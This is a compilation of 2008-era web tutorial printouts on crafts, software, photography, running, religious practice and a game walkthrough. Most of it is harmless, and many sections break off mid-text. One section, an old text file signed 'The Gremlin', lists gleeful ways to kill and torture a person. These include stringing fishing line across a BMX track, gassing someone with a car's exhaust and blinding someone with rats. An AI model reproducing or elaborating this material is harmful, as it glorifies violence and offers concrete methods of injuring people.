whistling sounds? Or anything that could sound like escaping air? Hint* When listening for a tire

leak, it is best to make sure the car is not running so you can hear.


Feel. While you're down there on the ground listening for escaping air, take both your hands and

touch every part of the tire. Squeeze it, rub it, hug it, do what you have to. You want to make

sure to reach as far around the back of the tire as you can. Some tires will develop a worn-down

spot from the amount of times it rubbed on another part of the car, and that can cause a tear in

the rubber. Another thing that you want to feel for is anything protruding from your tire. Things

like screws, nails and other large sharp objects have their way of getting lodged in your tires,

even if you don't normally drive around those things.


Your job, at this point, is to make sure that there are no obvious reasons for your tire to be leaking

air. If you do not see any reasons, hear any air leaks, or feel any holes or tears in the tire, then it is

time to get to know your tire a little better.

Let's talk about a technique that is most commonly used to find small air leaks.

You will need three things for this adventure:

A large bucket that is bigger and deeper than your tire.1.

Enough water to fill that bucket.2.

A leaky tire.3.

The steps to finding a leak in your tire are relatively easy. Let's go through them...

Get out your bucket and fill it all the way up with water.1.

Once your bucket is full, put your leaky tire in it and hold it down. 2.

Let the water settle and look around for bubbles.3.

If you don't see any, pull the tire out, turn it around, and stick it back in.4.

At this point in time, if your tire has a leak, you will see it. Whether it is a big leak or a small leak, a


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TUTORIAL MANUAL: Changing Colors http://nicetutz.blogspot.com/2008/03/changing-colors.html

1 3 11/4/2008 7:17

Cont@ctHome Page

Changing Colors

Color can emphasize text. There are two ways to use color:

Change the color of the text (Font color).

Highlight the text with a different color (Text Highlight color).


When you change the color of text, you are physically displaying a different color for each letter.

Normally, Word displays text in black, but you can change the color to anything you want, such as

bright red or dark green. If you choose a light color for your text, it may be hard to read against a

white background. To change the color of text, follow these steps:

Click the Home tab and then select the text you want to color.1.


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How to Sew a Fabric Shopping Bag http://www.allfreecrafts.com/sewing/shopping-bag.shtml

1 6 10/4/2008 9:10

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Free Sewing PatternHow to Sew a ShoppingBag How to Sew a Fabric

Shopping Bag

Copyright © 2006 SilverSeams.com

It seems that every time I turn around, I'm being handed another silly plastic shopping bag. I have lots of places to recycle them (reuse them, actually) - the library takes them, etc., I still get tired of dealing with them. Invariably, I collect several bags stuffed with other bags before I remember to take them to the library, and that's just wrong.

I know a lot of people carry their own tote bags, and I have a couple of them, but I often end up with five or six bags' worth of groceries, and tote bags aren't that convenient to load. So I looked more closely at one of the ubiquitous plastic bags here at Silver Seams World Headquarters, and realized it would be really, really easy to sew.

A serger (overlocker, for non-USAns) helps here, but isn't necessary.

Take a piece of fabric, 37 1/2" wide by 21 1/2" long. Fold it in half long-ways, and

stitch the side closed. I assume 1/4" seams here, but it's not critical. If you sewed it right sides together (RST), turn it now... but you can just leave the seam inside the fold. These are utilitarian, not beautiful.

Now fold in the sides slightly over 3". Now is where you'd tuck that seam in, but it doesn't matter.

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+$/$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$ $+ Some interesting ways to +$ kill a friend (or enemy) $+ +$ by $+ -=> THE GREMLIN <=- +$ $+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+

Hi, it’s me, The Gremlin again. This time, I decided to write about somecool ways to kill somebody you don’t like, and have a good time laughingwhile you do it.

..If he/she races BMX, string a 60 pound test line across a jump or in themiddle of the track...

..Staple his mouth to the tail-pipe of your BMW, and put a piece of tapeacross his nose, then drive about 20 miles at top-speed, by this time, hismouth should be enmeshed with the tail-pipe, his knuckles, knees, and feetwill be practically non-existent from dragging on the ground, AND he’ll bequite dead from inhaling all that Carbon Monoxide...

..Make concrete blocks out of his hands, then hang him from a bridge acrossa not too well travelled road, by his feet. Set him swinging, and wait forthe next truck or van...

..Hang him spread-eagle off a diving board, with a weight tied around hisstomach. If the board is low enough, you should be able to bounce up anddown on the board, and watch him drown slowly...

..Tie a rope around his neck straight up to the top of a sail on a sail-boat, and strap his feet to the floor, straight in the middle of the boat.Every time the sail comes around, it should hit him quite hard in the head.I recommend this only for very windy days...

..Use him as a marker in a giant slalom ski race...

..slide razor blades across his back for about 20 minutes, then give himthe choice of shooting himself in the head, or being thrown in a bath-tubfull of gin...

..tie him up spread eagle in front of a pitching machine, in such a waythat the tip of his nose is about 2 inches away from the barell...

..tie him up, and handcuff him. Then put his fingers in between the type-head of an old-fashioned typewriter, and the paper. You might like typingout your opinions of him, while he suffers...

..Take a pair of handcuffs and put them on his feet. Then strap a ropebetween them, so you hold on to the rope. Go on Space Mountain in Disney-Land, and drag him off the back. If you get tired or scared, just let go,it’s only 80 or 90 feet down to the concrete...

..steal all the jacks at the Indy 500, and use him as a replacement...

..If he happens to be a sadist, pluck off his arms and legs, just as heprobably did to flies...

..bury him standing up 8 feet deep in sand, then make a wider area aroundhis head about 2 feet deep. Pry his eyes open with something (preferablyinfectious) and pour in salt. THEN let in six rats, and watch them gougeout his eyes for food...

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How To Make An Icon - Photoshop Tutorial | PhotoshopSupport.com http://www.photoshopsupport.com/tutorials/cian/how-to-make-icons.html

1 4 10/4/2008 10:55

Learn Photoshop CS2 (Photoshop 9) on our Photoshop CS2 Tutorial Page.Blog Templates — Blog Design Tips And Resources.

Keyfob: Anatomy Of An Icon

Following on from a previous article on toolbar icon design we're going to tackle it's BigBrother, the Application Icon. The two serve slightly different functions within the programbut adhere to the same idea. While we could start on an existing application, we’re going toembrace vaporware and produce an Icon for an Application that doesn’t exist. This is simplyto show the process. This tutorial will follow the construction of an Icon for an imaginaryapplication called “Keyfob.” We’ll say that it’s an application for locking and unlocking the Macremotely. This is partly inspired by a process where someone managed to put their Mac tosleep using a mobile phone.

Where Do We Start?A biro pen, a sketchpad and a cup of tea usually works well for me. However above all these, the most important tool for developing Icons is...?

A DictionaryEvery Icon is communicating a metaphor and because you are appealing to a wide audience,the accepted meaning for a term is very important. So the inclusion of a Dictionary with 10.4Tiger was a boon for anyone who has ever tried to sum up “vertically integrated certificationprocess” in a 16x16 square.

This process may sound a bit silly but every Icon needs to rely on a strong metaphor which isunderstood by the widest audience. Simplicity always wins out so in this case we will produce a key which looks like it attaches to a chain.

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Simple Flash Blog » Interactivity in Flash using hitTest() method http://www.simpleflashblog.com/2007/11/26/interactivity-in-flash-usi...

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Interactivity in Flash using hitTest() methodPosted by: Bloggerita in ActionScript

hitTest() method is very useful for flash developers especially when creating games or elearning applications. In th is tutorial I will give asimple example on how to detect collision between two movie clips using hitTest() method.


1. Create a new Flash document and save it as hitTest.fla on your computer. Go to Modify >> Document (Ctrl+J) and set width to 400 pixels and height to 300 pixels.

2. Insert three new layers and rename them from top to bottom: actions, spaceship, planet and background.

3. In the first frame of the background layer import what picture you desire: go to File >> Import >> Import to Stage and select the picture from your computer and click the Open button. Align the picture both horizontal and vertical.

4. Go to the planet layer and in the first frame draw or import a picture of a planet. Select the planet picture or drawing an d convert it to a movie clip: go to Modify >> Convert to Symbol (F8) and from the window that appears select MovieClip as Type, center for registration point and give it a name of planetMC, then click Ok button. Select the movie clip, go to the Properties Ins pector and type planet_mc in the Instance Name text field.

5. Now, in the first frame of the spaceship layer draw or or import a picture with a spaceship. Convert it to a movie clip with the name spaceshipMC. Give it also an instance name of spaceship_mc.

6. Go back to the background layer and put here a dynamic text field (use Text tool from the Tools panel). Choose Comic Sans MS font, size 14 and white color. Give to the text field an instance name of space_txt.

7. Go to the first frame of the actions layer, open the Actions panel (F9) and write the ActionScript code below:

spaceship_mc.onPress = function(){startDrag(this, false, 40,15, 360, 285)}spaceship_mc.onRelease = spaceship_mc.onReleaseOutside = function(){this.stopDrag(); if (spaceship_mc.hitTest(planet_mc)){ space_txt.text="The spaceship is on the planet!" }else{ space_txt.text="The spaceship is back in space!" }}

8. Great! Now test your movie (Ctrl+Enter) and you’ll see that space_txt change the text displayed depending on spaceship_mc overlaps ornot planet_mc.



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Inventgeek.com - Ultraviolet Moldless Bread Box - Page 2 http://www.inventgeek.com/Projects/BreadBox/Page2.aspx

1 2 10/4/2008 6:03

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Step one is to take our bread box and figure out where we want to place our power source.We want to try to keep this looking visually pleasing. Another thing to think about iswhere the heat sources will be. The bulb and the inverters will put out some heat, butultimately the brick is the highest heat producer.

In the back of this breadbox we drilled a 9/16ths hole so that we could install a internalextension plug to the bulb.

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How to Perform the Salaat - Islamic Prayer http://muslim-canada.org/salaat.html

1 7 22/4/2008 4:19

How to Perform Salaat,

the Islamic Ritual PrayerBefore Salaat1. Body, clothes and place of prayer must be clean. 2. Perform wudu (ritual ablution) if needed. 3. Women are required to cover their hair. 4. Face the Qibla, the direction of Mecca. 5. Stand erect, head down, hands at sides, feet evenly spaced. 6. Recite Iqama (private call to prayer): 6a. Here are some sample audiofiles of the Athan (call to prayer) Quicktime, they are very similar to Iqama:Real Audio MP3

Allaahu Akbar (4x) Ashhadu Allah ilaaha illa-Lah (2x) Ash Hadu anna Muhamadar rasuulullah (2x) Hayya' alas Salaah (2x) Hayya' ala Falaah (2x) [Fajr only] A-Salaatu Khayrun Mina-Naum (2x) Qad qaamitis Salaah (2x) [Iqama only - not recited in Athan] Allaahu Akbar (2x) Laa ilaaha illa-Lah

God is great. (x4) I bear witness that there none worthy ofworship except God. (x2) I bear witness that Muhammad is theMessenger of God. (x2) Come to prayer. (x2) Come to felicity. (x2) [Fajr only] Prayer is better than sleep. (x2) [Iqama only] Our prayers are now ready. Ourprayers are now ready. (x2) God is great. (x2) There is none worthy of worship except God.

7. Express intent to perform Salaat (niyyat):

I intend to offer _____ rakats of the ____ prayer, and face the Qibla for the sake of Allah and Allah alone. (For example: "I intend to offer the 4 rakats of the Isha prayer and face the Qibla for the sake of Allah andAllah alone.")

Begin Salaat1. Niyyat: Stand with respect and attention; put the world behind you. Bring hands to ears, palms forward, thumbs behind earlobes and say (The entire prayer must be recited inArabic, but for your information we give the English translation next to the Arabic transliteration) :

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MS-Office Tutorials: Editing Data with the Pop-up Toolbar http://officetuts.blogspot.com/2007/12/editing-data-with-pop-up-toolba...

1 3 11/4/2008 7:24

Editing Data with the Pop-up Toolbar

As soon as you select data, Word 2007 displays a pop-up toolbar that displaysthe most commonly used commands (displayed as icons). This pop-up toolbarappears to the upper right of the data you selected as a faint image. Thecloser you move the mouse towards this pop-up toolbar, the darker andsharper the toolbar appear. The farther you move away from the toolbar, thefainter it appears.

To use this pop-up toolbar, follow these steps:

Select data using the mouse. Selecting data with the keyboard will notdisplay the pop-up toolbar.

Move the mouse pointer to the area to the upper right of the selecteddata. The pop-up toolbar appears. The closer you move the mouse tothe toolbar, the more visible the toolbar will appear.

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Martial Arts Tutorial http://www.natkd.com/martial_arts_tutorial.htm

1 4 10/4/2008 6:43

Martial Arts TutorialHome | About Us | Amazon Store | Class Schedule | Contact Us | Dan Registry | Discussion Forums | DVD | Events | Gallery | Links | Martial Arts A

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A Guide to Selecting a Martial Arts SchoolCourtesy of www.natkd.com

Factors to Consider When Selecting a Martial Arts SchoolChoosing a martial arts school to train yourself or your child is an important decision. There are many factorsto consider when selecting a place to train such as:

Location1.Instructor2.Price3.Disclosure of Costs and Fees4.Martial Arts Style or System5.General Fit to Your Needs.6.

This guide is unique in that it will not only help you explore issues to help ensure that you find a school withquality instruction. The guide will also help you find a good "school situation" in terms of the customerrelationship and business interactions that will be healthy and enjoyable for you. This will enable you to stickwith classes over the long term, receive a quality training experience and a positive customer experience sothat you can become an avid martial artist and maintain peace of mind throughout the multi-year experience ofyour martial arts journey.

This information will assist you in choosing a school regardless of the type of martial art that you are interestedin learning such as a Tae Kwon Do School, a Tang Soo Do School, a Karate School, a Kuk Sool Won School,a Jujitsu School or a Kung-Fu School.

LocationOne of the most important aspects of selecting a martial arts school to train at is the location. Most studentsattend a class with in three miles of their home. An ideal school is one that is located within one to two miles ofyour home. If the school is a short distance from your home, there is a greater chance that you or your childwill be able to attend classes regularly. Depending on the age of your child and your preferences as a parent,attending a school within walking or bicycling distance of your home may eliminate the need for you to driveyour child to class. Additionally, if the school is located close to your home, you will still be able to get to classif you run late during the work day and avoid traffic, etc…

While location alone is not the most important factor in selecting a school, it is the factor most likely to affectyour ability to regularly attend classes and the likelihood of your attending classes for the long term. Drivingmerely 15 minutes to class results in 1 to 1.5 hours of commute time per week, which is 75 hours per year! Because of this broad reach and affect, you should weigh location seriously in your decision for selecting aschool.

InstructorThe instructor is one of the most important things you should consider in your decision. The head instructor ofthe school should be knowledgeable, experienced, capable and most of all a good teacher. The headinstructor should actually teach a significant portion of the classes the school offers. There are several factorsyou should explore with a potential instructor.

You should look for a school with a head instructor who has attained sufficient rank to understand the martialarts system taught at the school thoroughly. Most people will tell you that Black Belt is only the beginning of amartial artist’s journey. A 1st Degree Black Belt has just learned the basic curriculum for his art. The black beltranking system is sometimes compared to the education system.

Rank Educational System ComparisonWhite/Yellow/OrangeBelts Elementary School

Green/Blue/Purple Belts Middle SchoolRed/Brown Belts High School1st - 3rd Dan BlackBelts University - Bachelor's Degree

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Martial Arts Books/VideosKarate,Self-Defense,Jujutsu, Judo, Taekwondo, Kung Fu & More www.FightingArts.com

Taekwondo 3D ProgramExplore the Art of Taekwondo in 3D RevolutionaryTraining System! www.TKD3D.com

How To Put Google Street View To Practical Use -- InformationWeek http://www.informationweek.com/news/services/data/showArticle.jht...

1 3 22/4/2008 3:57

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If Google Street View is available, streets will be outlined in blue.

(click for image gallery)

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How To Put Google Street View To Practical Use

Google Street View can scope out real estate, travel destinations, and even save you from your next parking ticket -- all from your desktop, laptop, or smartphone browser.

By Mitch Wagner InformationWeek ? » 16, 2008 04:00

Google (NSDQ: GOOG) Street View is the closest thing to teleportation that you can find outside the starship Enterprise. Using Street View, you can click on Google Maps and see panoramic photos taken on the ground on streets in 33 American cities. It combines the convenience of standing in the street and looking around with the comfort of not being hit by truck.

The tool lets you move your position back and forth on the map, to simulate walking up and down the street, or you can click elsewhere on the map and instantly be thousands of miles away.

Google Street View is one of the many ways to procrastinate on the Internet. You can easily find yourself bleary-eyed at 4 in the morning virtually cruising the streets of Schenectady, for no other reason than pure curiosity.

But Google Street View is also a practical tool for making life easier. Here are five ways you can use Google Street View to improve your productivity -- plus, as an added bonus, tips for wasting all that time you saved bychecking out fun things to see.

How To Use Google Street View

If you're already familiar with Google Street View, skip over this sectionand go to our first tip. If you don't know how to use Google Street View, read on to get filled in.

Like most Google services, it's easy to figure out.

First, go to Google Maps. Enter an address in the search box. 1.

When you've found the location you're looking for, click the box marked "Street View" at the top right corner of the map


If Street View is available in the area you're looking at, streets where the service is available will be outlined in blue. You'll also see a little yellow icon of a man at the address you've selected.


To call up Street View, click the yellow icon. If Street View is available at that location, an image will pop up.


To navigate, drag the icon, or click in the Street View image popup and use your computer's arrow keys.


To link to or embed a specific Street View image, click the "Link to this page" link at the top right of the map.


You'll get a popup with snippets of code. You can cut-and-paste the code, to either link directly to the map, or to embed a map, with a Street View image, in your own page on the Web. We've done both inthis article.


Now that you know how to use Street View, read on to learn what it can do for you.

Page 2: Check Out The Neighborhood With Google Street View 1 | 2 | 3 Next Page »

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New way of making a ferrofluid. Cost only 1.00$!: Collect ferric oxide ... http://www.instructables.com/id/EG83Q22P1IES9J5RRL/

1 3 10/4/2008 8:31

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Feb 4, 2007. 4:26 PM

New way of making a ferrofluid. Cost only 1.00$!by Zujus on Sep 29, 2006 in TECH & CRAFT email it!

step 4 Collect ferric oxideCollecting ferric oxide:Get a magnet. Roll it with paper (paper is needed to separate ferric oxide from magnet). Collect all your Fe2O3.Let ir dry and put it somewhere in safe place.

Repeat step 3:Not all oxide separated from a tape. You can repeat procedure with acetone few time to have a better effect.

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solidification says:

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That is not Fe2O3, but Fe3O4. your source on howstuffworks is wrong. Fe2O3 is red and paramagnetic, not ferromagnetic.

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Step 4:Confirm that you do not have any other accounts that have been turned over to a collections agency. Even a small debt owed to a hospital or other service provider will harm your chances of receiving a credit card, especially if you have bad credit.

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Untitled Document http://www.aliagadesign.com/tutorials/car_tutorial_01/car_modeling_...

1 6 10/4/2008 11:41

Cortesy of / Cortesia de Questions [email protected]

Strata 3D Tutorial There is a way to model cars in Strata, it might be not to easy but it did work for me, more or less. I used beziersurface to model all the car´s panels. -You need to have some lines to descrive your design in the front, side and topviews. -Then you can start building a rectangular plane to start modeling a first panel of the car. You convert thisplane surface into a bezier surface. -Then with reshape tool you can select the points and move them to adjust thispanel to your guide lines. You can also use the point´s hanndels to cuve any way you want. -If you don´t want tomodel it panel by panel do a skinning and convert it to bezier. -If you want to divide a panel into two different ones.What I do is to add an extra line. Then I duplicate the same panel over it (so it will be exactly in the same position).Now with the reshape tool you select the extra points and delete them in each of the two panel. -There are manyways to obtain your panel in orther to convert them into bezier. Bezier is a very nice way to model becase you dealwith not too many points(with nurbs you have to mannage with many more points). For example anoder way to obtainyour bezier panel is by extruding some guding lines(this way they will be easier to conect them latter.

Guiding Lines in all views(Front,Side and top)

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Vanilla Days : HDR Tutorial: How to create ‘High Dynamic Range’ i... http://www.vanilladays.com/hdr-guide/

2 26 10/4/2008 11:45

ConclusionCredits and Links

What’s New?

I’ve reorganised this guide to include more on Photoshop’s HDR feature and why I feel thatPhotomatix’s is better. The latest version of Photomatix will detect if your TIFF’s have the sameEXIF info and it will ask you to confirm which images have which exposure settings. This meansyou don’t have to remove the EXIF from them anymore. A great feature.

This guide has also been featured in the November issue of Professional Photographer. I think that’san official stamp of approval from the photography industry that HDR is indeed great forphotographers world wide. It can produce nice balanced images on harsh sunny days, or it can createarty pictures of already stunning landscapes.

Aims of this tutorial

The main aim of this tutorial is to help people use HDR techniques to produce photos with a higher dynamic range than they normally get in a standard out of the camera photo. I will show you how to take a shot from the one on the left, to the one on the right.

What is HDR?

HDR means ‘High Dynamic Range’. Using software like Photomatix you can create images with amore detail in the highlights and shadows than you can with a normal photo from todays digitalcameras. Its similar to the old technique of exposure blending. Taking one photo for the sky and onefor the ground, then merging them both together in Photoshop. HDR takes it a step further byincrease the amount of detail in the image and allows you to create some unique photos. You can useit carefully to create natural looking photos or you can use it creatively to create atmospheric andemotive photos. The choice is yours as to how you process the end result.

Tools Needed

A RAW editor such as Aperture, RawShooter, or Photoshop. Secondly, the HDR program. I use Photomatix.

Step 1: Source images

There are two main ways to create the source images needed for HDR. You can either use AEB, autoexposure bracketing, on your camera to take 3 images while you are out, or you can use RAW to

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Block Party 2.0 - Instructables - DIY, How To, life, home http://www.instructables.com/id/Block-Party-2.0/

1 3 22/4/2008 6:02

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Block Party 2.0by mandible on Aug 25, 2007 in LIFE & HOME email it!

intro Block Party 2.0Throwing a block party is a great way to get to know your neighbors. Just ask York from Chicago.

York has lived on the same block almost his entire life -- nearly 40 years -- but, as his wife teased him, he didn't really know his neighbors. One big reason is that York lives on a block near Lake Michigan that primarily is home to condo buildings, rather than the single-family bungalows or three-story greystones and A-frame homesthat characterize many Chicago neighborhoods. Without a front stoop, or even their own front doors, neighbors can easily become invisible to one another.

When York became president of his neighborhood group, he realized how much easier it is to solve community problems if you know your neighbors. He decided to throw a block party after talking to the staff at his local alderman's office to see what was entailed.

York's block party was a huge success, attracting about 200 people from his block. This Instructable recreates how he turned those strangers into neighbors.

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E-Mail PR: How to Start a Mailing List, E-mail Uses of Article - Inc. A... http://www.inc.com/articles/2001/08/23426.html

1 3 22/4/2008 5:44

By: Mitchell Friedman

E-Mail PR: How to Start a Mailing List

Published August 2001

EMAIL THIS ARTICLE (http://www.inc.com/sendit/sendit.cgi?/articles/2001/08/23426.html&title=E-Mail+PR%3A+How+to+Start+a+Mailing+List) PRINTER FRIENDLY (23426_Printer_Friendly.html) COMMENT ON THIS ARTICLE (#sound_off)


E-mail lists can enable you to generate awareness and, more importantly, build mutually beneficial relationships with key audiences.

Two main categories of mailing lists exist: those others create and manage, and those you create and manage. This column looks at the latter.

You can quickly and easily set up mailing lists using Microsoft Outlook or Outlook Express, Eudora, Yahoo, Hotmail and other popular e-mail software and services. It's simply a matter of following the instructionsprovided.

If you envision creating larger lists or prefer not to deal with administrative tasks such as removing bad e-mail addresses andmanually adding new people to the list, considerservices such as bCentral List Builder(http://www.bcentral.com/products/lb/default.asp) , Yahoo! Groups(http://groups.yahoo.com/local/news.html) , and Topica (http://www.topica.com/) . These servicesenable you to set up and oversee mailing lists quickly and easily.

It's a relatively simple task to set up a mailing list, regardless of which option you choose. But more must be done to get the mostbenefit from your list. Begin by answering the following questions.

What's the purpose of the mailing list? First, decide whether you have worthwhile information to communicate. Second, determinewhether e-mail is the best tool for communicating this information.

Are the individuals in your audience e-mail savvy? Do they want to receive information from you via that channel or via anothermeans? Is e-mail the most efficient and effective means for you to disseminate that information?

Who is the audience for the mailing list? Customers? Vendors? Business partners? Media? An effective mailing list -- or any formof communication, for that matter -- can't meet the needs of all audiences. You need to focus your content to have a chance atsucceeding in your communications efforts.

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rec.running Beginners' FAQ Part 1 of 2 http://www.faqs.org/faqs/running-faq/beginners/part1/

1 7 11/4/2008 2:08

Part1 - Part2

rec.running Beginners' FAQ Part 1 of 2There are reader questions on this

topic!Help others by sharing your


Message-ID: <running-faq/beginners/[email protected]>X-Last-Updated: 2003/03/10From: [email protected] (Ozzie Gontang)Newsgroups: rec.running, rec.fitness, rec.sport.miscSubject: rec.running Beginners' FAQ Part 1 of 2Reply-To: [email protected] (Ozzie Gontang)Summary: Information and Tips for Beginning RunnersDate: 11 May 2004 10:50:45 GMT

Archive-name: running-faq/beginners/part1Last-modified: 10 March 2003Posting-Frequency: 14 days

Answers to REC.RUNNING BEGINNERS' FAQ and Interesting Information

The following posting is a supplement to the regular rec.running FAQ. Itprovides information of particular interest to people just starting out asrunners. It is organised in traditional FAQ fashion, as a series ofquestions and answers.

Send me,Ozzie Gontang, FAQ maintainer <[email protected]> anycorrections, updates, suggestions, or proper info of sources or holder's ofcopyright. Yonson Serrano is the previous maintainer of the rec.runningBeginners FAQ which was originally compiled by Steve Conway.

======================================================================rec.running Beginners FAQ - a guide for aspiring runners======================================================================

Once you've finished the beginners' FAQ, you can move on to look in themainmain rec.running FAQ for more information.

ftp://rtfm.mit.edu/pub/usenet/rec.running/or the web site: http://www.faqs.org/faqs/running-faq/

* Index_________0 Background Information1 Why Exercise ?2 Why running ? (practicality)3 Why running ? (the other reasons)4 Should someone beginning an exercise program get medical clearance ?5 Shoes, socks and feet6 Other equipment7 The first few weeks8 The next few weeks9 Developing further10 Training Schedules11 When to train12 Running alone or with others13 How fast to run14 Dissociation and Association15 Getting out the door16 How the body adapts - what to expect as you get fitter17 Possible injuries for a beginner18 Stretching and strength exercises19 Fitting running into your life

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3ds Max Resources | Tutorials | Creating a Rube Goldberg machine in... http://www.3dsmaxresources.com/tutorials/creating-rube-goldberg-ma...

1 2 11/4/2008 7:44



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Step 3

Right click it and convert the rectangle to an editable Spline. Press 1 toenter vertex mode and area select the two right vertices. Right click andchoose ‘move’ and slightly lower them a little. Notice the nice curve wehave made.

Figure 3.

Step 4

Click the modifier list and from the drop down menu choose ‘Extrude’.Line it up in the top view to the box.



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HTML <!-- ??? --> - HTML Code Tutorial http://www.faqs.org/docs/htmltut/_33n45n45n.html

1 1 11/4/2008 2:13

Home >> Ignore-Me CodeIgnore-Me Code <XMP>

<!-- ??? -->

Usage Recommendation

use it

<!-- ??? --> allows you to insert comments into an HTML document and have them completely ignored by the browser. This is useful for such things asrevision histories and notes about how to improve the document.

For example, this code

<!-- Creation Date: June 21, 1996 --><!-- Modifications: --><!-- Sep 26, 1996: Added Links to Steve's Page --><!-- Oct 10, 1996: Updated product list -->

produces this (nothing):

<!-- ??? --> will even "comment out" other tags. Everything is commentedout until the closing -->. However, commenting out code tends to result insloppy code. The best use for <!-- ??? --> in this sense is for experimentation, to try out different code without deleting other attempts. Butwhen the experimentation is done, take out the unused code.

For example:

<!-- <IMG SRC="biguglypumpkin.gif" ALT="pumpkin"> --><IMG SRC="pumpkin.gif" ALT="pumpkin">

would be good for trying out different GIFs, but take out the commented part after you've decided on an image.

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1 Basic Training, Party, Arms, Equipment, Skills, Tactics 2 Tour of Duty, Missions, Side Missions, Endgame 3 Intelligence Reports, Clues



This walkthru of BUCK ROGERS: COUNTDOWN TO DOOMSDAY is divided into threeparts. Part one, Basic Training, contains basic game mechanics and game universeinformation that the player should know before starting the game. Part two, TOUROF DUTY, contains game hints. Part three, INTELLIGENCE REPORTS, containsdetailed information on how to complete the game.


The Logbook indicates that a medic, rocketjock, and engineer are required;having two medics is highly recommended, and a rogue is desirable. Otherwise,the skill system allows for a variety of party compositions. Tinkers are bestcreated as engineers. There are no other obviously good or bad matches betweenraces and careers.

It is worthwhile to use the Modify command to maximize the various attributes(such as Strength) after you add a character to the party.


All guns come with a set of reloadable clips; reloading is done automatically.As a result, there are no reloads to put in the Gear inventory. A gun with allits clips filled has 250 rounds, which is quite adequate for most missions. Forthe occasional longer missions, two guns or 500 rounds is sufficient. However,battles are won by having the right weapon for the occasion. This means carryingfrom four to six different weapons.

Needle guns are the best weapons. Nothing stops them, nobody is immune to them,and only a few opponents have partial immunity to them. Partial immunity meanssome rounds will hit for 0 hit points. The only disadvantage of needle guns istheir short range. Having two needle guns per character is highly recommended.

Laser rifles are good long-range backups for needle guns. Aerosol clouds willstop laser beams and combat robots have partial immunity to lasers. For thatreason, some characters should carry rocket rifles in place of, or in additionto, laser rifles. Chaff clouds will stop rockets. ECM packages protect againstrockets. Combat robots have ECM packages built into them.

Bolt guns are as good as needle guns, but have an even shorter range. Microwaveguns are very effective against unarmored opponents, but useless against anyonewearing armor. For these reasons, these weapons should not be carried unless theparty finds ones that improve THAC0 (e.g., a Lunarian bolt gun will improve theTHAC0 by 4!). All other guns are not worth carrying unless they also improveTHAC0.

Melee weapons (swords, axes, etc.) are not worth carrying with one exception:Characters with high strength (18 or above) get hit bonuses when they attackwith melee weapons. It is worthwhile to equip your strong characters with meleeweapons for close combat.


All grenades have a 3x3 square blast area. Chaff grenades are extremely useful

for fighting heavy combat robots.

Since you will be outnumbered in most of the battles, stun grenades are veryuseful for evening the odds by knocking some opponents out while you fight therest.

All explosive grenades are very useful. The remaining grenades are of limiteduse for various reasons, the main one being that most of your opponents areimmune to their effects.

Page 128: The Instructional Capital volume I

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Art wallpaper with stars - Adobe Photoshop Designing - Adobe Photo... http://www.adobetutorialz.com/articles/2962/1/Art-wallpaper-with-stars

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Art wallpaper with starsPublished Yesterday | Designing

Art wallpaper with stars - part 1

A really in-depth tutorial on how to create a nice abstract art style wallpaper.

Begin by representing the file that would have 1600x1200 px and 72 dpi.

Choose after that the Rectangle Tool (U) to draw the background of the picture to be.

Select next parameters for the made layer by making a mouse click on this layer on the layers?


Blending Options>Gradient Overlay

Photoshop CS2 TutorialsBreakthrough Online Video Tutorials Teach You Photoshop In Just 2 Hours www.LearnPhotoshopNow.com

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Getting Browser details and Version Detection using JavaScript http://www.xfunda.com/index.php?option=com_content&view=articl...

1 3 11/4/2008 10:46

Getting Browser details and VersionDetection using JavaScript


We work hard to get more traffic to make our web portal or blog popular. We usevarious tips and techniques to achieve our goals. We go for search engineoptimization, forum and discussion boards. We put our back link there. People use itand from different parts of the world people comes to our web portal or blog. Theyhave different platform, operating systems, and different web browsers. Some time wefail to serve page compatible to them. And pages not get properly display and nexttime they avoid to come back. Get your browser details here...

To avoid such situation analysis of traffic plays an important role. In this article we willgo to get browser details of the web browser using JavaScript. We are going see howto get it. We can used that data to store in database and used for analyse it, so we canmodify our site structure to make it more compatible with different version of webbrowser. Here we are not going to store it in database, we just going to display it inweb browser itself. Here navigator object will play an important role. The navigatorObject describes more modern ways to accomplish browser-version detection.


Despite a name reminiscent of the Netscape Navigator-branded browser, the navigatorobject is implemented in all scriptable browsers. All browsers also implement a handfulof properties that reveal the same kind of information that browsers send to serverswith each page request. Thus, the navigator.userAgent property returns a string withnumerous details about the browser and operating system.For example, a script running in Internet Explorer 7 in Windows Vista receives thefollowing value for the navigator.userAgent property:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;

.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322;

InfoPath.2; FDM; .NET CLR 3.5.21022)

The same script running in Firefox 1.5 on a Macintosh

reveals the following userAgent details:

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US;

rv: Gecko/20080311 Firefox/


Now we will go get more details. The first thing we need to do is access the platformproperty of the navigator object—the value of this property will tell us which platformthe user is on. navigator.appName will gives you browser name, Please see belowpeace of code:

<h3> Your Browser details are as follows:</h3>

<script language="javascript" type="text/javascript">

var StrDummy = navigator.appVersion;

strVersion = StrDummy.substring(0,4);

document.write("<center><table border=1


document.write("<center><b>", navigator.appName,"</b>");


document.write("<center><table border=1


document.write("<td>Code Name: </td><td><center>");

document.write("<b>", navigator.appCodeName,"</td></tr>");

document.write("<tr><td>Version: </td><td><center>");


document.write("<tr><td>Platform: </td><td><center>");

document.write("<b>", navigator.platform,"</td></tr>");

document.write("<tr><td>Pages Viewed: </td><td><center>");

document.write("<b>", history.length," </td></tr>");

document.write("<tr><td>Color depth: </td><td><center>");

document.write("<b>", window.screen.colorDepth," Bits


document.write("<tr><td>Java enabled:


if (navigator.javaEnabled()){

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Hello JAVA GUI Clean http://www.rooseveltrp.com/articles/3133/1/Hello-JAVA-GUI-Clean/...

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Home JAVA Programming Java GUI Hello JAVA GUI Clean

Hello JAVA GUI CleanBy Roosevelt Purification Published 12/23/2007 Java GUI Unrated

Hello JAVA GUI Clean


Welcome to the GUI Hello Java program. In this tutorial you will be given the knowledge of GUI, how to make frames, panels, buttonsand how to display dialog boxes.

What is GUI?

